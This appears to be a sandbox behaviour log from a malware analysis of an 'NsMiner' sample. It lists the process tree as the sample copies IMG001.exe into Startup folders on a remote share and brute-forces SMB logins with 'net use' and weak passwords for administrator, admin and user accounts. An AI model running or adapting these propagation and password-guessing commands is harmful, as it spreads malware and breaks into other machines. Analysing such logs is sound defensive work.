C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3792
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4664
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:3816
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:2828
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:1388 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:3484 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "6⤵PID:3468
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5604
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:4420
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- Runs ping.exe
PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6016
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5792
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5372
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3980
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2432
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1616
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:2552
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5784
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1948
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:472
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "6⤵PID:4524
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1848
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:1332
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4468
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:6100
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"6⤵PID:2552
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"6⤵PID:6068
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5988
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"1"6⤵PID:2036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:6128
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:4072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:1000
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"6⤵PID:5312
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3364
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:796
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"1"6⤵PID:5456
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"1"6⤵PID:1748
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"1"6⤵PID:5424
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:5032
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"10.127.255.255"6⤵PID:448
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"10.127.255.255"6⤵PID:5600
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1988
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"10.127.255.255"6⤵PID:3752
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"10.127.255.255"6⤵PID:5296
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1332
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"10.127.255.255"6⤵
- System Location Discovery: System Language Discovery
PID:4664
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"10.127.255.255"6⤵PID:6076
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5252
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"6⤵PID:4072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"6⤵PID:5688
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3816
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"10.127.255.255"6⤵PID:4596
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"10.127.255.255"6⤵
- System Location Discovery: System Language Discovery
PID:6112
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:5092
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"10.127.255.255"6⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"10.127.255.255"6⤵PID:5232
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:5796
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"administrator"6⤵PID:3028
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"administrator"6⤵PID:1388
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3416
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"administrator"6⤵PID:5748
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"administrator"6⤵PID:4420
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:4356
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"administrator"6⤵PID:3340
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"administrator"6⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5684
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "administrator" /user:"administrator"6⤵PID:2432
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "administrator" /user:"administrator"6⤵PID:3360
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5496
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"administrator"6⤵PID:3184
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"administrator"6⤵PID:3036
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:2036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"administrator"6⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"administrator"6⤵PID:5232
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5096
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"user"6⤵PID:3028
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"user"6⤵PID:2992
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2228
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"user"6⤵PID:4804
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"user"6⤵PID:5300
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5372
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"user"6⤵PID:448
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"user"6⤵PID:240
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:576
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "user" /user:"user"6⤵PID:1304
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "user" /user:"user"6⤵PID:5460
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2672
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"user"6⤵PID:5188
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"user"6⤵PID:2372
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3184
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"user"6⤵PID:3540
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"user"6⤵PID:2036
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2072
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"admin"6⤵PID:2348
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"admin"6⤵PID:1940
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:2984
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"admin"6⤵PID:5808
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"admin"6⤵PID:5656
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:632
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"admin"6⤵PID:5860
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"admin"6⤵PID:888
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5440
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "admin" /user:"admin"6⤵PID:3504
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "admin" /user:"admin"6⤵PID:6068
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5528
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"admin"6⤵PID:5892
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"admin"6⤵PID:1948
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3688
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"admin"6⤵PID:5972
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"admin"6⤵PID:5656
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:5476
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"àäìèíèñòðàòîð"6⤵PID:5812
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"àäìèíèñòðàòîð"6⤵PID:576
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1172
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"àäìèíèñòðàòîð"6⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"àäìèíèñòðàòîð"6⤵PID:1476
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"àäìèíèñòðàòîð"6⤵PID:3348
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"àäìèíèñòðàòîð"6⤵PID:3596
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:1988
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:3568
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:4600
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5284
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1805" /user:"àäìèíèñòðàòîð"6⤵PID:2660
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1805" /user:"àäìèíèñòðàòîð"6⤵PID:2980
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:812
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"àäìèíèñòðàòîð"6⤵PID:2584
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"àäìèíèñòðàòîð"6⤵PID:4640
-
-
-
